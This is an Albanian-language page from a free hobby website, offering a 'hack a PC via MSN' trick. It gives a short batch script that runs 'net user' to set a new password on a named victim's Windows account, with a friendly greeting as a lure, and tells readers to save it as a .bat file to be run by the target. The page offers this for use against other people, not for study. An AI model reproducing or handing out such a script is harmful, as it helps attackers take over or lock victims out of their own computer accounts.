Hack pc permes msn new :p..
ja se qka duhet te bejme per te hackuar pc permes msn-se

1 krijo nje text document dhe vendos kete ::

Cito:
@echo off
net user "useri i viktimes" *123456*
echo tung shoku im
pause

gati me harru: tek *123456*nenkupton passin e ri qe ju doni tja jepni
kjo osht per te hackuar net usera
ruajeni si diqka qe deshironi.bat prapashtesen (.bat)
ajo se qka do te beni eshte qe de te hackoni net userin e dikujna mos harroni te futni passin ne ato YJET **
(shift
userin e viktimes nuk e shenoni me thojneza

tung klm 
WwW.Argetohu-ks.page.tl vend i dijes....
 
 
 
 
 
 
 
Sod ne faqen ton pati 289596 visitors (1419288 hits) Ne ket faqe
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free